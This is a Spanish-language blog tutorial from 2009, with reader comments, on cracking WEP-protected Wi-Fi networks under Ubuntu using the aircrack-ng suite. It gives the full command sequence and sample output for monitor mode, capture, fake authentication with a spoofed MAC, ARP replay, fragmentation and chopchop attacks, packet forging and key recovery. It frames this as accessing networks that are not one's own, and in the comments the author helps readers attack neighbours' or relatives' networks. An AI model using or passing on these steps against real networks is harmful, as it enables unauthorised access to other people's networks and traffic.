CraCkear redes wep con trafico o sin trafico desde Ubuntu 9.04

Escrito por Julián
Publicado el mayo 25, 2009 a las 5:42 pm

Redes con Trafico

Cuantos de nosotros no hemos intentado acceder a una red wifi que no es nuestra?, pues bien,explicare como llevar acabo este tipo de ataques;espero que sea utilizados para fines educativo y demostrar que las redes wifi con seguridad WEP es lo mas debil para nuestra redes.

Tambien debo agregar que esto lo realice utilizando Ubuntu 9.04 , con un adaptador usb NETGEAR WG111v2 y los programas Aircrack y Airodump.

Si deseas ver la compatibilidad que tiene tu targeta wifi para este tipo de auditorias ve al siguiente enlace http://hwagm.elhacker.net/htm/tarjetas.htm .

Instalar Aircrack-ng

Como primer paso es la instalcion de este programa el cual nos permitira cifrar la contraseña WEP,ademas de eso viene con otras herramientas incluidas como el Airodump, Airocap, entre otras.

Podemos descargar el Aircrack en paquete *.deb desde aqui o si lo prefieren pueden hacerlo desde el gestor de paquetes synaptic.

Cómo usar Aircrack

Lo primero es abrir un terminal y nos logueamos como super usuario:

$ sudo su

Como segundo paso, pasamos nuestra targeta a modo monitor el cual nos servira para hacer una captura de paquetes y observar las redes que tienen trafico.

#airmon-ng start wlan0

si observan bien el resultado que nos lanza, muestra el nombre que recibira nuestra conexion en modo monitor, en mi caso mon0(cero).

El tercer paso, es ver las redes wifi a las cuales podemos acceder:

# airodump-ng mon0

Consejos:

Sustituye “mon0″ por la interface de tu tarjeta wireless (mira cuál es con el comando iwconfig).

Si te da un error del tipo “resource busy” significa que estás conectado a otra red wifi. Para que funcione simplemente desconectate de la red.

Una vez hecho esto nos sacara algo asi:

En este caso tenemos 2 redes a elegir, nos fijamos en la red ‘gatowifi’ con una MAC de 00:00:00:00:00:00 en el canal CH 11, ya que si puede observar en el campo “”DATA”" reporta una serie de paquetes los cuales nos indica que hay trafico para nuestra captura,ahora suponiendo que este es nuestro objetivo nos fijamos en que tenga modo de encriptacion WEP.

Consejos:

Para que airodump deje de actualizar los datos pulsa “Ctrol+C”.

Puedes hacer búsquedas más detalladas usando las opciones que aparecen al ejecutar “airodump –help”

Ahora que ya tenemos fijado un objetivo lo que vamos a hacer es capturar Data y Beacons para luego lanzar aircrack-ng y descifrar su clave WEP.

Lanzamos airodump-ng para que capture paquetes:

$ airodump-ng --channel 11 --bssid 00:00:00:00:00:00 -w captura mon0

Esta captura se guardara en la carpeta donde estemos hubicados, en mi caso la /home.

Ahora vamos a autenticar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.

$ aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0

en la opcion -h ocultamos nuestra MAC con una introducida (inventada) por nosotros

Nos deberia decir al final:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Insertaremos paquetes ARP e intentar acelerar la inyección. Abrimos otra consola y

# aireplay-ng -3 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0

este tambien lo dejamos correr mientras que trabajamos.

Lanzar aircrack-ng para descifrar la contraseña:

# aircrack-ng -a 1 -e gatowifi -b 00:00:00:00:00:00 captura-01.cap

El argumento “-a 1″ indica que estamos descifrando una contraseña WEP, para descifrar una WAP deberiamos poner “-a 2″.

Aircrack-ng tambien se debe dejar correr de fondo mientras se capturan paquetes porque ira intentando descifrar la clave segun vaya consiguiendo nuevos paquetes.

Esto seria todo por el momento, solo es cuestion de esperar unos minutos para decifrar la contraseña.

Redes sin Trafico

Bien, hasta el momento he escrito lineas con una red que tiene trafico en su campo “DATA”, pero que pasaría si no hubiese ese trafico y el campo “DATA” se mantuviera en cero? ,eso quiere decir que tendremos que generar el trafico con nuevos ataques , en este caso llamados CHOP CHOP o ataque de FRAGMENTACION , los cuales consisten en generar un paquete con la encriptación WEB e inyectarlo, así podriamos generar el trafico que necesitaremos.

Ahora explicare como llevar acabo estos pasos, aunque debo decir que para empezar tendran que seguir el post hasta el punto 3 y la autentificación del punto 2 que se haya completado satisfactoriamente.

Ataque de fragmentación

En un terminal escribimos:

# aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 mon0

Donde:

* -5 significa ataque de fragmentación.
* -b 00:00:00:00:00:00 es la dirección MAC del punto de acceso.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación.
* mon0 es el nombre de nuestra interface.

Al ejecutar este comando mostrara algo como esto:

aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 mon0 Waiting for a data packet... Read 127 packets...

Size: 114, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = 01:00:5E:00:00:FB
Source MAC = 00:40:F4:77:E5:C9

0×0000:0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B….^…..l~
0×0010:0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R….0s
0×0020:c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.”…..A6r.
0×0030:4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M.
0×0040:8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX…z.+.>…
0×0050:4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m….U2….
0×0060:c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(….”m.q
0×0070:9c9f ..

Use this packet ? y

en donde precionamos las tecla “y” para continuar.

Si muestra algo como esto:
Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with ...

Es que hemos tenido exito y se debe haber generado un paquete “fragment-0203-180343.xor” el cual lo podremos usar en el paso 7 para generar un paquete arp.

Ataque chopchop

Este ataque lo llevaremos acabo siempre y cuando el ataque 4 no haya funcionado.

Escribimos en un terminal:

# aireplay-ng -4 mon0 -h 11:22:33:44:55:66

Donde:

* -4 significa ataque chopchop.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en Dla falsa autenticación.
* mon0 es el nombre de nuestra interface.

Al ejecutarse mostrara algo como esto:
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9

0×0000:0842 0000 ffff ffff ffff 0014 6c7e 4080 .B……….l~
0×0010:0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:…._.
0×0020:e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 …H……._=.
0×0030:d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ….j…..%.[.
0×0040:16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C…>.q.r.e.
0×0050:cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Precionamos la tecla “y” y todo continua.
Saving chosen packet in replay_src-0201-191639.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 |
Offset 84 ( 1% done) | xor = EB | pt = 55 |
Offset 83 ( 3% done) | xor = 47 | pt = 35 |
Offset 82 ( 5% done) | xor = 07 | pt = 4D |
Offset 81 ( 7% done) | xor = EB | pt = 00 |
Offset 80 ( 9% done) | xor = CF | pt = 00 |
Offset 79 (11% done) | xor = 05 | pt = 00 |
Offset 78 (13% done) | xor = 69 | pt = 00 |
Offset 77 (15% done) | xor = CA | pt = 00 |
Offset 76 (17% done) | xor = 65 | pt = 00 |
Offset 75 (19% done) | xor = 9E | pt = 00 |
Offset 74 (21% done) | xor = 72 | pt = 00 |
Offset 73 (23% done) | xor = 01 | pt = 00 |
Offset 72 (25% done) | xor = 71 | pt = 00 |
Offset 71 (26% done) | xor = A1 | pt = 00 |
Offset 70 (28% done) | xor = 3E | pt = 00 |
Offset 69 (30% done) | xor = BB | pt = 00 |
Offset 68 (32% done) | xor = AE | pt = 00 |
Offset 67 (34% done) | xor = FB | pt = 00 |
Offset 66 (36% done) | xor = 43 | pt = 00 |
Offset 65 (38% done) | xor = D4 | pt = 00 |
Offset 64 (40% done) | xor = 16 | pt = 00 |
Offset 63 (42% done) | xor = 7F | pt = 0C |
Offset 62 (44% done) | xor = 1F | pt = 37 |
Offset 61 (46% done) | xor = 5C | pt = A8 |
Offset 60 (48% done) | xor = 9B | pt = C0 |
Offset 59 (50% done) | xor = 91 | pt = 00 |
Offset 58 (51% done) | xor = 25 | pt = 00 |
Offset 57 (53% done) | xor = 94 | pt = 00 |
Offset 56 (55% done) | xor = F3 | pt = 00 |
Offset 55 (57% done) | xor = D6 | pt = 00 |
Offset 54 (59% done) | xor = FA | pt = 00 |
Offset 53 (61% done) | xor = EA | pt = 01 |
Offset 52 (63% done) | xor = 5D | pt = 37 |
Offset 51 (65% done) | xor = 33 | pt = A8 |
Offset 50 (67% done) | xor = CC | pt = C0 |
Offset 49 (69% done) | xor = 03 | pt = C9 |
Offset 48 (71% done) | xor = 34 | pt = E5 |
Offset 47 (73% done) | xor = 34 | pt = 77 |
Offset 46 (75% done) | xor = 51 | pt = F4 |
Offset 45 (76% done) | xor = 98 | pt = 40 |
Offset 44 (78% done) | xor = 3D | pt = 00 |
Offset 43 (80% done) | xor = 5E | pt = 01 |
Offset 42 (82% done) | xor = AF | pt = 00 |
Offset 41 (84% done) | xor = C4 | pt = 04 |
Offset 40 (86% done) | xor = CE | pt = 06 |
Offset 39 (88% done) | xor = 9D | pt = 00 |
Offset 38 (90% done) | xor = FD | pt = 08 |
Offset 37 (92% done) | xor = 13 | pt = 01 |
Offset 36 (94% done) | xor = 83 | pt = 00 |
Offset 35 (96% done) | xor = 4E | pt = 06 |
Sent 957 packets, current guess: B9…

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)

Esto quiere decir que hemos tenido exito y que ya se ha generado el paquete “replay_dec-0201-191706.xor” el cual lo podremos usar en el siguiente paso para generar un paquete arp.

Vamos a usar packetforge-ng para crear un paquete arp

Con los puntos 4 o 5 se debe haber generado un PRGA el cual se encuentra en los archivos con extensión “xor”.Podemos entonces usar este PRGA para generar un paquete para inyectar.

Generaremos un paquete arp para la inyección:

# packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request

Donde:

* -0 significa generar un paquete arp.
* -a 00:00:00:00:00:00 es la dirección MAC del punto de acceso.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless.
* -k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255).
* -l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255).
* -y fragment-0203-180343.xor es el archivo del que se leerá el PRGA.
* -w arp-request es el nombre del archivo en el que se guardará el paquete arp.

y se mostraría algo como esto:

# Wrote packet to: arp-request

Inyectar el paquete arp

Abrimos un terminal y escribimos:

# aireplay-ng -2 -r arp-request mon0

Donde:

*
-2 significa que usamos el modo interactivo para seleccionar el paquete
*
-r arp-request especificamos el nombre del archivo con el paquete arp
*
mon00 es el nombre de nuestra interface

Al ejecutar nos mostrara lo siguiente:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2

0×0000:0841 0201 0014 6c7e 4080 0009 5bec eef2 .A….l~@…[.
0×0010:ffff ffff ffff 8001 8f00 0000 7af3 8be4 …………z.
0×0020:c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ………..q.Z
0×0030:f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ….U..>……
0×0040:6ada 92f2 j…

Use this packet ? y

Escribimos la tecla “y” para usar este paquete y aparecera algo como esto:

Saving chosen packet in replay_src-0204-104917.cap
You should also start airodump-ng to capture replies.

End of file.

Por ultimo miramos la ventana que ejecutamos con airodump y veremos como los paquetes empiezan a subir rapidamanete.

Ejecutamos aircrack para obtener la clave web

# aircrack-ng -z -b 00:00:00:00:00:00 capture*.cap

Donde:

*
-z significa que se use el método PTW para obtener más rápido la clave WEP
*
capture*.cap selecciona todos los archivos que comienzan por “capture” y con extensión “cap”.
*
-b 00:00:00:00:00:00 selecciona el punto de acceso en el que estamos interesados

Espero que esta guía les sea util.

Archivado en: Auditoría Wirless

40 comentarios a esta entrada

Abel O'Rian A. el 1 junio, 2009 1:56 am
funciona
con sólo 20.000 IVS aprox. encontró la key.
Usé el driver que viene en ubuntu (rt61) y si me dejó inyectar tráfico , algo asi como 500 paquetes por segundo.
Pr cierto, debería ser así:
3-ARP-request replay. Abrimos otra consola y
# aireplay-ng -3 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0
el 0 despues del -3 no va.
saludos
Julian Rodriguez el 1 junio, 2009 9:59 am
Hola Abel……Si tienes razon con respecto al 0, creo que cometi un error de digitacion de todas maneras, gracias por el aporte.
alan el 22 junio, 2009 4:40 am
saben yo tengo un compaq f564la y tiene una targeta wifi broadcom, pero no me resulta no me sale el nombre de mi coneccion en modo monitor sale el nombre de mi red pero no sale el nombre del chip y los driver tampoco ¿que sera loq pasa? porfavor ayudenme soy un noob en ubuntu XDD
alan el 22 junio, 2009 4:51 am
tengo un compaq f564la con targeta wifi broadcom hice todo loq dice el tutorial, pero cuando voy en la face 3 "#airmon-ng start wlan0
si observan bien el resultado que nos lanza, muestra el nombre que recibira nuestra conexion en modo monitor, en mi caso mon0." ami no me sale ni mono0 ni nada por lo mismo no puedo seguir.
otra cosa q me llamo la atencion esq sale como q no tubiera los driver intalados como para hacer la operacion, tampoco reconoce el nombre del chip (tengo los driver q me dio ubuntu para la targeta y me toma redes super bien)
¿q sera loq pasa?
disculpen si la pregunta es muy noob pero esq hace poco q tengo ubuntu
por favor ayudenme
grx
Anonymous el 22 junio, 2009 11:17 am
Hola, tengo Una tarjeta Atheros 5005G pero no se como instalar en ubuntu?? o donde puedo saber eso y si se puede crackear redes wep?? con esta tarjeta es una Tp-link WN-550
Julian Rodriguez el 26 junio, 2009 3:33 pm
Primero q todo perdonen la demora pero ultimamente he estado un poco ocupadillo asi q empezare a responder algunas dudas:
Hola Alan….consulta primero si tu tarjeta Broadcom tienen soporte para hacer este tipo de operaciones desde este enlace http://hwagm.elhacker.net/htm/tarjetas.htm
Hola para ese tipo de tarjetas atheros he escuchado sobre su instalación con ndiswrapper en linux y tu tarjera configurandola si sirve para crackear redes en linux, si deseas verificarlo ve a este enlace http://hwagm.elhacker.net/htm/tarjetas.htm
y para un tutorial q tal vez te sirva para la instalacion
http://www.adslayuda.com/Linux-ndiswrapper.html
alan el 27 junio, 2009 12:57 am
hola denuevo sabes en el listado q me diste no sale mi targeta o mas bien yo no la vi XDD
pero mi modelo es la broadcom 4311 rev 02, e tratado hasta con ndiswrapper y nada ya nose q puedo hacer ojala con el dato q te di puedas ayudarme
de antemano muchas grasias
Julian Rodriguez el 27 junio, 2009 1:04 pm
Hola Alan…..Pues si no aparece en el listado diria que tu tarjeta no es compatible mas sin embargo verifica que tu interfaz si sea wlan0 con el comando iwconfig, y si es asi, solo me queda recomendarte este tuto ya q no poseo mucha experiencia con este tipo de tarjetas http://www.mey-online.com.ar/blog/index.php/archives/broadcom-43xx-en-ubuntu
mucha suerte!!
alan el 27 junio, 2009 5:55 pm
ante todo muchas gracias por tu ayuda julian, pero lamentablemente con el comando iwconfig me sale esto:
root@skynet-laptop:/home/skynet# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11bg ESSID:"" Nickname:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Bit Rate:54 Mb/s Tx-Power:32 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Power Managementmode:All packets received
Link Quality=5/5 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
pan0 no wireless extensions.
por loq se ve estoy jodido
tengo una duda ¿con un access point dlink DWL-2000ap+(airplusG+ 2.4ghz wireless access point) puedo usarlo para ponerlo en modo monitor? o conq otra cosa puedo?
se agradece si me pudieras guiar un poco
Julian Rodriguez el 27 junio, 2009 6:31 pm
Hola Alan……Observando lo q te ha lanzado el comando q te dije me he percatado q tu interfaz no es wlan0, eso quiere decir q tienes q escribir el siguiente comando para el punto tres
"#airmon-ng start eth1"
Si observas bien Alan la salida q te da el comando iwconfig son las interfaces por las cuales estan conectadas tu equipo a una red inalambrica, por ejemplo:
la primera es
-lo no wireless extensions
Quiere decir q no hay ningun dispositivo conectado ahi
y si observas la eth1:
-eth1 IEEE 802.11bg ESSID:"" Nickname:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Bit Rate:54 Mb/s Tx-Power:32 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Power Managementmode:All packets received
Link Quality=5/5 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
te esta diciendo q detecto un dispositivo de red en esa interfaz en otras palabras tu tarjeta, por esa misma razon te digo q tu interfaz no es wlan0 sino eth1.
y para terminar, el dispositivo q me dices funciona como HUB, q sirve para distribuir el trafico de una red hacia diferentes dispositivos, mas no para realizar este tipo de crackeos wifis.
Saludos
Anonymous el 5 julio, 2009 7:45 pm
Hola
No eh podido crackear la red y necesito ayuda pues algunos pasos no los logro entender bien.
Agradeceria su ayuda en verdad
Mi correo es: kiraketlli_dark-sheik_deathgod.elite-hack@hotmail.com
Agradeceria en serio.
De aqui en adelante no puedo avanzar:
2-Los pasos siguientes son opcionales.Nos vamos a identificar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.
# aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0
en la opcion -h ocultamos nuestra MAC con una introducida (inventada) por nosotros
Nos deberia decir: Association successful
3-ARP-request replay. Abrimos otra consola y…
Javier el 6 julio, 2009 11:19 pm
Hola que tal, me sirvió muchísimo tu tutorial, pero se me presento un problemita ya en el ultimo paso, cuando usamos aircrack-ng trato de obtener la clave pero no asocia en ESSID pues este tiene dos palabras, en los pasos anteriores, p.e. en la identificación para inyectar tráfico utilizo "gato negro" en essid, pero en aircrack no lo asocia, ¿qué puedo hacer?
Julian Rodriguez el 10 julio, 2009 5:04 am
Hola Javier…..como asi q tiene dos palabras?..mmmmm…si puedes enviame una captura de la pantalla y me detallas mas informacion, mi correo es lluriam19@hotmail.com.
Tambien dime, la red q crackeas tiene como nombre "gato negro"?, por q al inyectar trafico no se necesita la ESSID, lo que se cambia en la inyeccion de trafico es la MAC sobre la opcion -h
Quedaria asi de esta forma:
# aireplay-ng -2 -a 00:00:00:00:00:00 -h MAC_inventada -r captura-01.cap mon0
y con aicrack-ng tienes q utilizar son los datos q tu has recopilado, por ejemplo:
aircrack-ng -a 1 -e nombre_de_la_red -b MAC_de la red captura-01.cap
ya que si alguno no es el correcto no te asociara, claro esta q esto te lo digo suponiendo q todo lo que hayas echo anteriormente estuviese bien.
Saludos
Anonymous el 11 julio, 2009 7:20 pm
hola. Yo poco a poco fui entendiendo con un tutorial pero la parte que no logro es autenticarme y meterme en la red con el aireplay, nunca me asocia, lo intente dos o tres redes. tengo suficiente señal. Gracias.
Albertocasas007@yahoo.com.ar
elestebanta el 19 julio, 2009 2:23 pm
Hola, estoy intentando hacerlo con una red que tiene encriptacion wpa, sobre el final del tutorial decis que para esta encriptación hay que cambiar de "-a 1" a "-a 2", pero cuando hago esto me dice algo así como: "fopen(dictionary) failed: No such file or directory
Please specify a dictionary (option -w)."
así que me pierdo ahí.. lo demas venía joya, todos los pasos perfecto.Gracias
Julian Rodriguez el 20 julio, 2009 4:36 pm
Hola elestebanta……esa parte la dejo como cultura general, ya que que para ese tipo de redes se necesitan un diccionario y por eso te muestra ese error,y para terminar este tuto se centra en los conocimientos basicos para
decifrar las encriptaciones WEP.
Saludos
Anonymous el 4 agosto, 2009 1:57 pm
hola tengo una tarjeta tp-link-550g atheros, corri el live cd wifixlax 3.1 y no reconoce mi tarjeta. que pasa o hay otra forma para poder sacar sacar un pass con mi tarjeta o via windows. ayuda plsss.
Luis.
Samuel el 8 agosto, 2009 5:20 pm
Hola,
Sigo tus pasos de unos en uno, escaneando me dio:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1A:2B:0E:B8:DA -86 28 2 0 3 54 WEP WEP WLAN_
7A:2C:DB:FC:49:28 -1 19 0 0 31 54 . OPN anton
Opto por la primera, lo dejo capturando con: airodump-ng –channel 3 –bssid 00:1A:2B:0E:B8:DA -w captura mon0
y en la segunda solapa del terminal lanzo sudo aireplay-ng -3 -b 00:1A:2B:0E:B8:DA -h 11:22:33:44:55:66 -e WLAN_51 mon0
lo dejo escaneando, que va por unos 23000
PERO, en la tercera solapa, al mandar al atque con aircrack-ng -a 1 -e WLAN_51 -b 00:1A:2B:0E:B8:DA captura-01.cap
Opening captura-01.cap
me responde que:
No matching network found – check your essid.
Lo intento, y reintento, y no hay formas, nada…
¿Qué estoy haciendo mal??
Gracias de antemano,
Ubuntero
Julian Rodriguez el 9 agosto, 2009 1:23 pm
Hola amigo….has intentado cargar el driver desde el asistente de wifislax? o si no por ultimo intentalo con wifislax 4 beta de seguro q si te reconocera la tarjeta, aunque sinceramente sobre el tipo de chip de esas tarjetas atheros como la tuya he escuchado q carga muy bien en ubuntu pero no he tenido la oportunidad de trabajarlas.
Saludos
Julian Rodriguez el 9 agosto, 2009 1:29 pm
Hola Samuel…..Para Las redes WLAN_xx normalmente se utiliza una herramienta para desencriptar ese tipo de contraseñas llamada wlandrecrypter, intenta desencriptar con esta herramienta y despues me comentas como te fue…..mmmmm por ultimo no te preocupes q encontraras mucha informacion sobre el uso de wlandrecrypter
saludos
Anonymous el 26 agosto, 2009 9:59 pm
Julian Rodriguez dijo…
Hola elestebanta……esa parte la dejo como cultura general, ya que que para ese tipo de redes se necesitan un diccionario y por eso te muestra ese error,y para terminar este tuto se centra en los conocimientos basicos para
decifrar las encriptaciones WEP.
Saludos
Hola Julian
disculpa las molestias amigo yo igual tengo el mismo problema con "Please specify a dictionary (option -w)."
tendras alguna liga o link que pueda visitar para ver como solucionarlo ya google y lo unico que encuentro es instalarle el diccionario a ubuntu pero no se a que se refiere ese error de todas formas seguire buscndo agradeceria tu respuesta gracias por todo saludos.
Zouhair el 29 agosto, 2009 12:52 pm
hola!
me podeis hacer un favor… si alquien ha consiguido descifrar alguna contraseña de alguna red que ponga los comandos x fis…
s ke me quedo atascado en el ultimo paso que no consigo que me decodifique los pquetes que capturo…
este es mi e-mail: zouhair.chn@gmail.com
le estaría mUYy agradecido a quien me ayudara
y thanks =)
Julian Rodriguez el 3 septiembre, 2009 11:33 am
Hola Zouhair….los comandos estan todos, este post no esta hecho de copy paste se basa en la experiencia que he tenido respecto a las redes wifi con este tipo de seguridad.
Y he intentado ser lo mas claro posible.
Saludos
Anonymous el 11 septiembre, 2009 5:26 pm
Hola Julian, me gustaria saber si me funcionnaria este programa (P-wak) para lo que todos queremos o si talvez este otro (wifiway). Me gustaria saber porfavor escriveme a mi correo que ya te agregue. Gracias bye bye
Anonymous el 27 octubre, 2009 9:54 am
Perfecto el articulo se cumplio todo a excepción de que no fui capaz de inyectar paquetes con lo cual tarde 25 horas en capturar unos 70MG de fichero la ultima vez que comprobe la consola me comunicama que el proximo intento de desencriptado seria a los 50.000 IVS
Abel O'Rian A. el 28 octubre, 2009 4:30 am
anonimo ultimo:
Aveces cuando alguien se loguea en la red, la inyeccion funciona perfect, incluso sin inyectar se puede juntarlos. Es cosa de esperar. suerte
Valsrock el 19 enero, 2010 1:54 am
Hola amigo, hay unpequeño error al momento que dices “el campo “DATA” se mantuviera en cero? ,eso quiere decir que tendremos que generar el trafico con nuevos ataques”. Según mi experiencia tu necesitas al menos 1 paquete para poder capturarlo y generar el .xor y luego generar el ARP, de lo contrario seguira diciendote “Waiting a package”.
Corrigeme si me equivoco pero estoy buscando una manera para hacer q el AP siempre emita al menos un IV porque algunos se mantienen en 0 siempre, si tu sabes algo por favor respondeme.Salu2
Julián el 19 enero, 2010 2:49 am
Hola…….El post trata de dos tipos de ataques, uno con datas y otros sin datas, en el caso del que no posee datas se le puede generar un ataque el cual genere este trafico y asi hacer que estos paquetes(datas) se incrementen y obtener la clave. Y si es correcto con lo que dices que se necesitan por lo menos 1 par de paquetes para llevar acabo esa accion.
De todas formas para poder obtener esos paquetes y hacer un ataque de fragmentacion como el que tu deseas, tendras que ser paciente, tener una buena antena o que por lo menos la red presente buen nivel de señal.
cristopher... el 28 enero, 2010 6:46 am
emm .. mi targeta dice que es una ath1 que qiere decir con eso.. gracias seguire el tuto aver que pasa …
Julián el 6 febrero, 2010 12:12 pm
Ath1…..Normalmente eso sale cuando son tarjetas internas y no por USB.
jmsl23 el 15 febrero, 2010 6:49 pm
Hola tengo un pequeño problema con una red y es que no consigo asociarme a ella, primero probe tu tutorial con mi red y funciono perfecto me asocie y a los 5 minutos me saco mi clave pero la de mi hermana no consigo asociarme me dice algo asi
The interface MAC (00:1D:7E:11:6A:6F) doesn’t match the specified MAC (-h).
ifconfig rausb0 hw ether 11:22:33:44:55:66
18:42:42 Waiting for beacon frame (BSSID: 00:1A:2B:08:B2:E2)
18:42:43 Sending Authentication Request
18:42:45 Sending Authentication Request
18:42:47 Sending Authentication Request
18:42:49 Sending Authentication Request
18:42:51 Sending Authentication Request
18:42:53 Sending Authentication Request
18:42:55 Sending Authentication Request
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn’t been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You’re too far from the AP. Get closer, or lower
the transmit rate (iwconfig rate 1M).
¿como debo continuar?
Julián el 17 febrero, 2010 9:44 pm
Hola…….
mmmmmm…..como ultima opcion te toca intentar autenticarte con una mac conocida para el router, esto muchas veces se puede hacer visualizando con airodump los paquetes que se estan transmitiendo.
Juan el 8 marzo, 2010 6:23 pm
hola a todos, en especial a julian que parece que es el maestro.
mi caso es que, al lanzar el ataque: aireplay-ng -1 0 -e “nombre_red” -a “dir_MAC” -h “nuestr_MAC” mon0, ubuntu se me queda pillado, y antes de que tuviera que reinstalar ubuntu, me iba perfecto a la hora de asociarme, alguien sabe por que me pasa esto??
Julián el 10 marzo, 2010 11:58 pm
Hola Juan, la verdad no es que sea maestro, esta pagina solo la escribo con las experiencias que tengo y he tenido en linux, así que dejame decirte que lo que te ha ocurrido jamas me ha pasado.Losiento mucho pero no puedo darte una respuesta a ese problema
Francisco el 21 marzo, 2010 7:33 pm
Hola, tengo un problema parecido al de alan, me aparece lo siguiente:
root@ubuntu:/home/ujsek# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
eth2 IEEE 802.11bg ESSID:”Motorola” Nickname:”"
Mode:Managed Frequency:2.412 GHz Access Point: 00:14:A5:0F:FD:83
Bit Rate=11 Mb/s Tx-Power:32 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Power Managementmode:All packets received
Link Quality=2/5 Signal level=-77 dBm Noise level=-90 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:566 Invalid misc:0 Missed beacon:0
Por lo que he leído aquí, el problema es que eth2 no está activado en modo monitor, agradecería muchísimo que me expliquen cómo llevarlo a modo monitor. He intentado con airmon-ng start eth2, pero no me funciona, además he intentado seguir este tutorial: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack y dice que hay que usar un comando como airmon-ng start ath0 9 , creo que “9″ es el canal, pero tampoco me funciona usando airmon-ng start eth2 9. Gracias.
jc el 23 marzo, 2010 12:12 am
Hola cuando en los pasos finales dices que abramos otra consola, tenemos que hacer todos los pasos anteriores en la nueva consola osolo ponerle sudo su y buscar paquetes como le pones, por que yo abrì la otra termninal le puse su do su luego lo que tu pones y empezo a buscar paquetes y dice que lo va a guardar en replay_arp-0322-165829.cap pero paro que busque los paquetes y le pongo al final en el paso final en lugar de captura-01.cap ,replay_arp-0322-165829.cap????
anapaola el 26 marzo, 2010 7:44 pm
hola! Julian, tengo tu misma tarjeta, pero tengo un problema…. hace mucho estoy intentando lo que tu logras
Ubuntu no me deja ejecutar el comando wiconfig, dice: No command ‘wiconfig’ found, did you mean:
ya instle aircrack. instale este: http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_0.6.2-7etch1_i386.deb
y cuando escribo: airmon-ng start wlan0
Dice:
root@paola-desktop:/home/paola# airmon-ng start wlan0
usage: airmon-ng [channel]
Interface Chipset Driver
wlan0 Unknown Unknown (MONITOR MODE NOT SUPPORTED)
Como te dije, tengo tu musma tarjeta!
por favor ayudame si?
Julián el 27 marzo, 2010 9:09 pm
hola…..para empezar el comando es “iwconfig”, ya que de la forma en que lo escribes no es correcta, ejecuta de nuevo el comando iwconfig y verifica que tu antena wifi si este activada en la wlan0 ya que lo mas probable es que no estas redirijiendo bien la ejecucion del comando.
